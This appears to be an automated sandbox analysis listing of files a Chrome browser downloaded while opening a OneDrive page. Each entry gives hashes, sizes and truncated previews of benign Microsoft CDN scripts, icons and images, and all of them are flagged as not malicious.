                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (65474)
                                                          Category:downloaded
                                                          Size (bytes):727060
                                                          Entropy (8bit):5.525582625197318
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:94355BE1F3FD510B5AECC466303D7BDD
                                                          SHA1:1B7FF2B3D3B9EF9E94145CB753F9D18DEBB65395
                                                          SHA-256:7CD209A7CDF194FBF5A7351688D24590ABA63D6CA1536301DC4F473379977DAC
                                                          SHA-512:25C81768528D6EDA31DBCB7A43F5580D0A9F94DA7F93DB308D1D60E192B1F8EC40B56E486708009A907E1C8628307CCBC47024B81E82271BE834D033D0BA3CA4
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/1444.js
                                                          Preview:/*! For license information please see 1444.js.LICENSE.txt */.(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1444],{6619:function(){!function(e){var t={};function n(a){if(t[a])return t[a].exports;var i=t[a]={i:a,l:!1,exports:{}};return e[a].call(i.exports,i,i.exports,n),i.l=!0,i.exports}n.m=e,n.c=t,n.d=function(e,t,a){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:a})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var a=Object.create(null);if(n.r(a),Object.defineProperty(a,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var i in e)n.d(a,i,function(t){return e[t]}.bind(null,i));return a},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (9456)
                                                          Category:downloaded
                                                          Size (bytes):22355
                                                          Entropy (8bit):5.5553193140949695
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:9ACA83282FEAB3AACDEFA5FCB30A2B54
                                                          SHA1:AA48926F38FFD01C29DA4C988B3026CF0AE3E32E
                                                          SHA-256:8E87B50A97A4FC6B9D3ED93F593334084D6B16CB990C7E7FFF14F094F66878E1
                                                          SHA-512:9A8E312A01AF7A30132C54636F0A9C2C73797C00882B4D8658BD3676EDCDAE81F245C13552D5E20BEA75864D68218BDFA0F57BA1B4DBE88EA0D666A9D3DF06E2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/61481.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[61481],{404921:(e,t,n)=>{n.d(t,{CBW:()=>m,Erl:()=>u,HKJ:()=>f,IeZ:()=>p,Kox:()=>v,NGN:()=>c,V9R:()=>y,X5f:()=>b,X8t:()=>S,ZjO:()=>i,_yq:()=>_,cNx:()=>r,mAB:()=>l,ocm:()=>o,pUb:()=>d,wEt:()=>g,x7H:()=>h,xuG:()=>s});var a=n(639691);const i=(0,a.U)("CheckmarkFilled","1em",["M7.03 13.9 3.56 10a.75.75 0 0 0-1.12 1l4 4.5c.29.32.79.34 1.09.03l10.5-10.5a.75.75 0 0 0-1.06-1.06l-9.94 9.94Z"]),r=(0,a.U)("CheckmarkRegular","1em",["M3.37 10.17a.5.5 0 0 0-.74.66l4 4.5c.19.22.52.23.72.02l10.5-10.5a.5.5 0 0 0-.7-.7L7.02 14.27l-3.65-4.1Z"]),o=(0,a.U)("CheckmarkCircleFilled","1em",["M10 2a8 8 0 1 1 0 16 8 8 0 0 1 0-16Zm3.36 5.65a.5.5 0 0 0-.64-.06l-.07.06L9 11.3 7.35 9.65l-.07-.06a.5.5 0 0 0-.7.7l.07.07 2 2 .07.06c.17.11.4.11.56 0l.07-.06 4-4 .07-.08a.5.5 0 0 0-.06-.63Z"]),s=(0,a.U)("ChevronDownRegular","1em",["M15.85 7.65c.2.2.2.5 0 .7l-5.46 5.49a.55.55 0 0 1-.78 0L4.15 8.35a.5.5 0 1 1 .7-.7L10 12.8l5.15-5.1
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text
                                                          Category:downloaded
                                                          Size (bytes):167
                                                          Entropy (8bit):5.261507213042197
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:56E2B8D0C03BDF26F772A5597FFEE6E3
                                                          SHA1:F828D5137C53AF3A624A0DD454841136915DFAD2
                                                          SHA-256:5AC844776FFEE99EB2F3B0EC013A988872ED181C9C380BA711A09DD1FEC2CDDE
                                                          SHA-512:08F6E712BE29868451BE79F47ED5291EB1EC058C15F09A73105174687864AA53CE87EF4E2318C8DA6A4B92B8BD3C526F737B8214E336011552667A4BFAA7F0AA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/listsenterprise/110.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[110],{530:(e,t,n)=>{n.r(t),n.d(t,{ContextualMenu:()=>a.rXf});var a=n("fui.lco_956")}.}]);
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (11010)
                                                          Category:downloaded
                                                          Size (bytes):31667
                                                          Entropy (8bit):5.461142034655166
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:265AAE980A20DF2015B5E495363FE910
                                                          SHA1:D4FF536C055E7F0B62212100F1E934C963C36F66
                                                          SHA-256:07F128DB654415D2FBFE46BC9FC5164D88EABC6B1C0D15A0DB3448EB4C2F3EA0
                                                          SHA-512:43B2507EA0D79EBA6CFDD0FB5AB71A91BA4EA541622351E75620629B760B6E4685E4804A72CA83A36C7A2D3EB2F5C445B439B406ED37E8AF16813ACC2886DDE8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/74889.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[74889],{738683:(e,t,n)=>{n.d(t,{p:()=>i});var a=n(425813);function i(e){for(var t=[],n=1;n<arguments.length;n++)t[n-1]=arguments[n];for(var i=[],r=0,o=t;r<o.length;r++){var s=o[r];s&&i.push("function"==typeof s?s(e):s)}return 1===i.length?i[0]:i.length?a.T.apply(void 0,i):{}}}.,368013:(e,t,n)=>{n.d(t,{n:()=>o});var a=n(636003),i=n(535661),r=n(196056);function o(e){var t=i.n.getInstance(),n=(0,r.tz)((0,a.Ty)(),e);if(!t.classNameFromKey(n)){var o=t.getClassName();t.insertRule("@font-face{".concat(n,"}"),!0),t.cacheClassName(o,n,[],["font-face",n])}}}.,701144:(e,t,n)=>{n.d(t,{i:()=>o});var a=n(636003),i=n(535661),r=n(196056);function o(e){var t=i.n.getInstance(),n=[];for(var o in e)e.hasOwnProperty(o)&&n.push(o,"{",(0,r.tz)((0,a.Ty)(),e[o]),"}");var s=n.join(""),c=t.classNameFromKey(s);if(c)return c;var d=t.getClassName();return t.insertRule("@keyframes ".concat(d,"{").concat(s,"}"),!0),t.cache
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Unicode text, UTF-8 text, with very long lines (32709)
                                                          Category:downloaded
                                                          Size (bytes):34889
                                                          Entropy (8bit):5.376474026515414
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:B8369D4019C0AB342CDBFFC6F1950E62
                                                          SHA1:32E891B9CF53F95D0F86BF83E43C956BD76D76BF
                                                          SHA-256:FF2B793183540D99D331A3C3ED9D98EF2E64F1C39D546AAC9986AEC7DC1251AC
                                                          SHA-512:2B6D7AB07D22D209B0FE6367A90581AD6E3476B13B74044DAA5A114C35CF5DA5B3C00A185AA45EA2C0EC92EDF49278043307C12C018AE75BD67BB753117F5EED
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/63.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[63],{6335:function(e,t){var n=function(){function e(){this.R=0,this.G=0,this.B=0,this.A=e.maxComponent}return e.clone=function(t){return e.fromRgba(t.R,t.G,t.B,t.A)},e.equals=function(e,t){var n=!e,a=!t;return n||a?n&&a:e.R===t.R&&e.G===t.G&&e.B===t.B&&e.A===t.A},e.fromRgba=function(t,n,a,i){var r=new e;return r.R=Math.round(t),r.G=Math.round(n),r.B=Math.round(a),r.A=null!=i?Math.round(i):e.maxComponent,r},e.fromRgbaString=function(t){var n=new e;if(/^rgb.+/.test(t)){var a=t.match(/[\d.]+/g);n=e.fromRgba(Number(a[0]),Number(a[1]),Number(a[2]),4===a.length?Number(a[3])*e.maxComponent:null)}return n},e.fromHtmlColor=function(t){function n(e,t,n){return parseInt(e.charAt(t)+e.charAt(n),16)}var a=new e;if("string"==typeof t&&"#"===t.charAt(0))switch(t.length){case 9:a.A=n(t,1,2),a.R=n(t,3,4),a.G=n(t,5,6),a.B=n(t,7,8);break;case 7:a.R=n(t,1,2),a.G=n(t,3,4),a.B=n(t,5,6);break;case 4:a.R=n(t,1,1),a.G=n(t,2,2),a.B=n(
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (42915)
                                                          Category:dropped
                                                          Size (bytes):211632
                                                          Entropy (8bit):5.527139429273787
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:CAE2DAC0EDDD9A3ACD2AB6BD28D95862
                                                          SHA1:E9DCC5CBC134654DD33FF12F067F2CDCDFBA1408
                                                          SHA-256:2D7E8E6A7B93D14D1C0FBE011BF1D0AE88C225961D1E9FF13FABFB2F1BC38781
                                                          SHA-512:EA03C8FC297474A4CB78A8297F164DFD5955A42E64DDFE3999173BB11191D2605E64961568ECDCC718CAB6533B8F705BD52871752C86C828F74A95D048593528
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_plus_start"),(self["suiteux_shell_webpackJsonp_suiteux-main"]=self["suiteux_shell_webpackJsonp_suiteux-main"]||[]).push([["plus"],{93817:function(e,t,n){(t=e.exports=n(70002)(!1)).push([e.id,'.o365cs-base .oxbF2LyKwVB\\/a5\\+4gTMkFg\\=\\={display:-ms-flexbox;display:flex;-ms-flex-direction:row;flex-direction:row;border:1px solid hsla(0,0%,100%,0);box-shadow:0 1px 2px 0 rgba(0,0,0,.1);box-sizing:border-box;width:276px;padding-left:0;align-items:flex-start;margin:0 0 17px 16px}html[dir=rtl] .o365cs-base .oxbF2LyKwVB\\/a5\\+4gTMkFg\\=\\={margin-left:0;margin-right:16px}.o365cs-base .oxbF2LyKwVB\\/a5\\+4gTMkFg\\=\\=:hover{-webkit-box-shadow:0 8px 16px 0 rgba(0,0,0,.1);box-shadow:0 8px 16px 0 rgba(0,0,0,.1)}.o365cs-base .oxbF2LyKwVB\\/a5\\+4gTMkFg\\=\\=>button{min-width:30px;width:30px;height:36px;paddi
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text, with very long lines (59485)
                                                          Category:downloaded
                                                          Size (bytes):271731
                                                          Entropy (8bit):5.606404304650025
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:260B0C5714AB05DA82D568EB51F43A86
                                                          SHA1:277B34E7817F3EAA6AAA48D938FEF5BF67EEC9B3
                                                          SHA-256:68A8A784667FB59AFBE239817E1B75EEC0300988BAE948F453E5C3788E77068A
                                                          SHA-512:B8C54549E28B79A7F3901E5E409D7F2F422346F5556DAE5BE08C7C5A97BF3BE4088DD61A9741C5297B5C0338493E461AA9BCFFE6D4EFB64716624AD24B3379B8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/custom-formatter/custom-formatter.lib-99add3e8.js
                                                          Preview:/*! For license information please see custom-formatter.lib-99add3e8.js.LICENSE.txt */.(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["custom-formatter.lib"],{cfmt_708:function(){!function(){"use strict";!function(){if(void 0===window.Reflect||void 0===window.customElements||window.customElements.polyfillWrapFlushCallback)return;const e=HTMLElement;window.HTMLElement={HTMLElement:function(){return Reflect.construct(e,[],this.constructor)}}.HTMLElement,HTMLElement.prototype=e.prototype,HTMLElement.prototype.constructor=HTMLElement,Object.setPrototypeOf(HTMLElement,e)}()}()}.,cfmt_629:function(e,t,n){"use strict";n.r(t),n.d(t,{ashaAlert:function(){return l}});var a=n("cfmt_270"),i=/[^\w .,-]/g;function r(e){var t={c:0,s:-1};return e.replace(i,function(e,n,a){return function(e,t,n){var a=n.s===t;if(!a){t=t||0;var i=e.charCodeAt(t),r=void 0,o=void 0;n.s=-1,i<55296||i>57343?n.c=i:i<=56319?(r=i,o=e.charCodeAt(t+1),n.c=1024*(r-55296)+(o-56320)+65536,n.s=t+1):(n.c=-1,a=!0)}re
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (7975)
                                                          Category:dropped
                                                          Size (bytes):405136
                                                          Entropy (8bit):5.39991535838067
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:0A4728285554E24C3F3582DDFC9ED987
                                                          SHA1:6B9BBD72C4482BF7CF466C7CF977D3784FCEA65A
                                                          SHA-256:EED4DD9650390B7AEAAE2FAE0C57F407C49EFB9F9C88F93F6725522169771475
                                                          SHA-512:5827CC3505F9EA7257D1401A663C9930058207B3ADC4E5F8EC3382024E9BF76F392887140D77714D93DD93CD384C82A4CF9095B594FF7E8FD7B6600D32590034
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[365,1370,1523,959,960,2144,119,56],{3164:function(e,t,n){n.d(t,{a:function(){return x}});var a=n(39),i=n("tslib_538"),r=n("react-lib"),o=n("fui.util_175"),s=n(133),c=n(113),d=n(49),l=n(245),u=n(2119),f=n(1154),p=n(2118),m=n(240),_=n(283),h=n(205),b=n(29),g=n(150),v=(0,b.a)(),y=[],S=function(e){function t(t){var n=e.call(this,t)||this;return n._root=r.createRef(),n._cellMeasurer=r.createRef(),n._focusZone=r.createRef(),n._onSelectionChanged=function(){var e=D(n.props);(0,o.Xo)(e,n.state.selectionState)||n.setState({selectionState:e})},n._updateDroppingState=function(e,t){var a=n.state.isDropping,i=n.props,r=i.dragDropEvents,o=i.item;e?r.onDragEnter&&(n._droppingClassNames=r.onDragEnter(o,t)):r.onDragLeave&&r.onDragLeave(o,t),a!==e&&n.setState({isDropping:e})},(0,s.a)(n),n._events=new o.M0(n),n.state={selectionState:D(t),columnMeasureInfo:void 0,isDropping:!1},n._droppingClassNames="",n}return(0,i.e2)(t,e),t.ge
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text, with very long lines (56768), with CRLF line terminators
                                                          Category:downloaded
                                                          Size (bytes):339941
                                                          Entropy (8bit):5.890404605955734
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:F7007978CD8724F31FAB4F646735B08E
                                                          SHA1:ED71543598605B807590CC5ACBAFA7D6E006397A
                                                          SHA-256:2A3C6C4B9FDC3D04E4941F0AED090CBEE3E93693001759CA1C193300D35383C3
                                                          SHA-512:4032970A3F928B7EBAB12420AA16131DFB0AE3E81424B71751F15C9F1743790D6A27854DF299BC49233B90CC9904783E08A583911A9DB242DDD421A019D83088
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://myarrowleaf1-my.sharepoint.com/personal/marge_penrod_myarrowleaf_org/_layouts/15/onedrive.aspx?id=%2Fpersonal%2Fmarge%5Fpenrod%5Fmyarrowleaf%5Forg%2FDocuments%2FNorthwest%20Glass%20Manufacturing&ga=1
                                                          Preview:..<!DOCTYPE html>..<html lang="en-us" dir="ltr">..<head><meta name="GENERATOR" content="Microsoft SharePoint" /><meta http-equiv="Content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="Expires" content="0" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no" /><title>...OneDrive..</title><link rel="shortcut icon" href="/_layouts/15/images/odbfavicon.ico?rev=47" type="image/vnd.microsoft.icon" id="favicon" /></head>.. <body style="margin: 0; padding: 0;">.. <script nonce= 'fdf44233-e17d-4f80-b9cc-d0c4758a2442' >if(!spfxPerfMarks){var spfxPerfMarks = {};} var markPerfStage=function(key) {if(window.performance && typeof window.performance.now === 'function'){spfxPerfMarks[key]=window.performance.now();} else{spfxPerfMarks[key]=Date.now();} if (window.performance && typeof window.performance.mark === 'function') {window.performance.mark(key);}}
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (7706)
                                                          Category:downloaded
                                                          Size (bytes):8497
                                                          Entropy (8bit):5.601997026731746
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:45B3CE76D547D645CAFE9738AC71D8C7
                                                          SHA1:32CED5D26A3A08D1781845B870C04091406DC8C2
                                                          SHA-256:2459434EDFB0A877BAB41D510289ED9A8B954B282ADF3747C33786F38E8E5D4F
                                                          SHA-512:7444D98AF843C28EA10FBECCB355FF5BD7CB3383DE828892C08309151456135E06C3FB1685066E9F144C2BD8A231334429BEEEE1D3D3ACFB460416A9F7079641
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/72477.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[72477],{72477:(e,t,n)=>{n.d(t,{m:()=>A});var a=n(539155),i=n(42046),r=n(669866),o=n(973602),s=n(769163),c=n(734157),d=n(392756),l=n(274556),u=n(320681),f=n(161686),p=n(490539),m=n(931041),_=n(942474),h=n(82054),b=n(736892),g=n(191953),v=n(864843),y=n(725029),S=n(4737),D=n(825268),I=n(502027),x=n(146748),C=n(945945),O=n(695799),w=n(288820);const E=(0,O.X)({root:{mc9l5x:"fjseox",B7ck84d:"f1ewtqcl",B2u0y6b:"f132xexn",Bceei9c:"f158kwzp",Bahqtrf:"fk6fouc",Be2twd7:"fy9rknc",Bg96gwp:"fwrc4pm",Btd35i7:"fokg9q4",Beyfa6y:0,Bbmb7ep:0,Btl43ni:0,B7oj6ja:0,Dimara:"ft85np5",Bgfg5da:0,B9xav0g:0,oivjwe:0,Bn0qgzm:0,B4g9neb:0,zhjwy3:0,wvpqe5:0,ibv6hh:0,u1mtju:0,h3c5rm:0,vrafjx:0,Bekrc4i:0,i8vvqc:0,g2u3we:0,icvyot:0,B4j52fo:0,irswps:"f9ggezi",Byoj8tv:0,uwmqm3:0,z189sj:0,z8tnut:0,B0ocmuz:"f1bzqsji",De3pzq:"fxugw4r",sj55zd:"f19n0e5",Bhu2qc9:"fxeb0a7"},visible:{mc9l5x:"ftgm304"},inverted:{De3pzq:"fg3r6xk",sj55zd:"
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (7236)
                                                          Category:dropped
                                                          Size (bytes):7335
                                                          Entropy (8bit):5.137837224968061
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:19EA48B97943CA6EC9A809BF56C52A85
                                                          SHA1:FF8B027AD7BB2B0C1D79DE20FA83BF08851B66BE
                                                          SHA-256:A4570A3393508E86E924B76742746A681299E8F7A1FF618513C785A846AF8906
                                                          SHA-512:3D5C1BE0CBBBF167783EAE37FFAD192E0222C97BB7AF47EF25EA4047866531E43AF751425B35E4752167E8649E5CBD02D0CCC8F6848C149B566084E0ED48AE60
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:/*! For license information please see tslib-6a7224b3.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["tslib"],{tslib_538:function(e,t,n){n.d(t,{q5:function(){return r},DQ:function(){return S},$0:function(){return y},Gl:function(){return D},HE:function(){return v},yv:function(){return l},J4:function(){return w},_7:function(){return E},ic:function(){return f},j0:function(){return s},tI:function(){return p},e2:function(){return i},SO:function(){return u},Zu:function(){return O},VE:function(){return C},zH:function(){return I},Hu:function(){return d},Rd:function(){return c},pM:function(){return _},dc:function(){return o},lt:function(){return g},Ej:function(){return b},Hr:function(){return h},BW:function(){return m}});var a=function(e,t){return a=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])},a(e,t)};function i(e,t){if("fu
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (3257)
                                                          Category:downloaded
                                                          Size (bytes):3561
                                                          Entropy (8bit):5.338654599413312
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:9BE6D6B5056A372D5C5CF491C17C1702
                                                          SHA1:556210AA78419D638F8F39BA90F2625A9361FF88
                                                          SHA-256:F43D1A5362857D5BBE98AAE94B10A1991BC2BE5AADE799B86B0B9B09AD5EDFB6
                                                          SHA-512:6F322AF83B0DCE5BE864605E3DB35E99A4278FB4A0C0F72175580749DCF000C61ED0B40BABD8375B236ADE3AE2AEEEF02006304816EFF2FC79C8E84EB5A200B1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/listsenterprise/14.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[14],{1378:(e,t,n)=>{n.d(t,{a:()=>i});var a=n(784);function i(e){return"LinkTitle"===e.internalName?e.internalName:"Note"===e.subType?e.isRichText?"RTE":"MultiLine":e.subType&&a.a.includes(e.subType)?e.subType:"Unknown"}}.,891:(e,t,n)=>{n.r(t),n.d(t,{BaseFieldEditor:()=>_,BaseFieldEditorInner:()=>h});var a=n("tslib_538"),i=n(1),r=n(739),o=n(9),s=n("odsp.util_517"),c=n(25),d=n(5),l=n(1378),u=n(2),f=s.x9.isActivated("E39F083D-9B46-4999-A261-D854FAA8FB4B","06/23/2022","Use empty string if initialValue is undefined"),p=s.x9.isActivated("F5BB6944-B215-456E-BD08-38E6ECF97EC4","05/02/2023","Add an undefined check on the value and value.value"),m=s.x9.isActivated("c4359b78-0e16-441a-bfbf-d7a0e6adbbd6","09/29/2023","Add onBeforeSave functionality"),_=function(e){function t(t){var n=e.call(this,t)||this;return n.eventQosOpenFieldEditorAPI=new d.a({name:"FieldEditorsFunctionality.OpenFieldEditor",objectType:(0,l.a)(t.fie
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:downloaded
                                                          Size (bytes):919
                                                          Entropy (8bit):4.683413542817976
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:1E425F59C3D91508C63BDE68694BA116
                                                          SHA1:3542AE870A3C65D2D467D48EE2E24C463A01C7BA
                                                          SHA-256:2B486C70ADF73B332FE2A363941E24AEE1BEFA7DED7E9D3110D24E8B9B971C98
                                                          SHA-512:23B1DCAE541EF52D31B16BFFE78100E7C02B3A43FBFC85B2C22AA0C56DA478870440C2C69BF472639A2379116082076C81FED8C68F9458E90053C64EA4FD6EAA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/images/addtoonedrive/shortcutbadge_16_dark.svg
                                                          Preview:<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="16" height="16" rx="3" fill="#292929"/>..<path fill-rule="evenodd" clip-rule="evenodd" d="M4.5 5.125C4.15482 5.125 3.875 4.84518 3.875 4.5C3.875 4.15482 4.15482 3.875 4.5 3.875H11.5C11.8452 3.875 12.125 4.15482 12.125 4.5V11.5C12.125 11.8452 11.8452 12.125 11.5 12.125C11.1548 12.125 10.875 11.8452 10.875 11.5V6.00888L4.94194 11.9419C4.69786 12.186 4.30214 12.186 4.05806 11.9419C3.81398 11.6979 3.81398 11.3021 4.05806 11.0581L9.99112 5.125H4.5Z" fill="#479EF5"/>..<path fill-rule="evenodd" clip-rule="evenodd" d="M13 1.2H3C2.00589 1.2 1.2 2.00589 1.2 3V13C1.2 13.9941 2.00589 14.8 3 14.8H13C13.9941 14.8 14.8 13.9941 14.8 13V3C14.8 2.00589 13.9941 1.2 13 1.2ZM3 0C1.34315 0 0 1.34315 0 3V13C0 14.6569 1.34315 16 3 16H13C14.6569 16 16 14.6569 16 13V3C16 1.34315 14.6569 0 13 0H3Z" fill="#999897"/>..</svg>..
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:RIFF (little-endian) data, Web/P image
                                                          Category:downloaded
                                                          Size (bytes):22510
                                                          Entropy (8bit):7.985564124193874
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:3121EB7B90AAFBD79004290988D25744
                                                          SHA1:5584F1BEB7B9E8CA11833035C9962B3DDD54F904
                                                          SHA-256:6DBE807B8DA91D549A49BEEC3330D795601EC0F272EA232E91121F3ED703DFE4
                                                          SHA-512:ED25BF0B7C12742A7B71BC271364970508FB03A5096F42EEDC360CE92205AF5BE0AC4EB0567585882D34629D179F9CAB287839247C81F61D894360A83B28AAA3
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/images/emptyfolder/empty_files_v3.webp
                                                          Preview:RIFF.W..WEBPVP8X..............ALPHU1......$)J..C...,!....muO.o.1..PSJ).A....%9..!....m..@.I.....Np..3.5-.g.2p..m#5......D...B...W.].WI@S*I.T.z`.hj.H...F.m..$I..y...6.......{....`...H..("&..$.m...w..i......$E.D...............g.....1..33...J...D.).}..A...mC."...'.#.......O..FU=..].%3.....3....;.p|afffff>......M.E+iq..g.....v...Z....,.ED.x.TW.../......O.?......OO..Eg.n...):..d.........RW..............K.h...2-..K..Cgq.....\]...t..(......%...g=..8.b0..N..q. ..k...E.`..@HgM.Cf...+VBA&V.4.J.L.a..X...&B.O.1d.#...+....v.G........&".....e%.2{$2.B.7.QY.._.ngc.....K..D.M.(?j..P(..I....GIA..6 .......Q!..-..g.........=..z.hC.......p..e:Y]......6&1F.mL#e.F......P@.1...}......?2..[?>...8..Q...%#..d.....v.....\.A.....U`.0.....Q,&@n'....[..&dbQ...... ..!E...E......B.R.-b~....<'-.0T1| G.....1s9".0......,J..(...|z..._.k...F.3"..4$....\6_.....Q.x.&.h].3....j2...eV......;.|#.pc.1..$[.u.5....]..n.B!.....U+V.."....3UW...7..,.j.2....OGe.B .....N.....{.Z.+V.1.(.M..n...../.{
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (12428)
                                                          Category:downloaded
                                                          Size (bytes):37321
                                                          Entropy (8bit):5.432437497061678
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:CC01ADE3B20475FF89311C445E68BFF9
                                                          SHA1:78BF188ED63F4D82C19C3B84CF1EA5B088E52144
                                                          SHA-256:8C74ABBECB5A86F6C2227B81E6949F08DE674303A7FD8B2BE2528C4B2CC2000C
                                                          SHA-512:E3F7F66E5E4C57451D3C098F6790C0DDD72EDAF6A1F419AE1BFEC4A9EEC74F89FCA68C024ECED064268098F078609484DD862BB91D300041592142B00482A701
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/1941.js
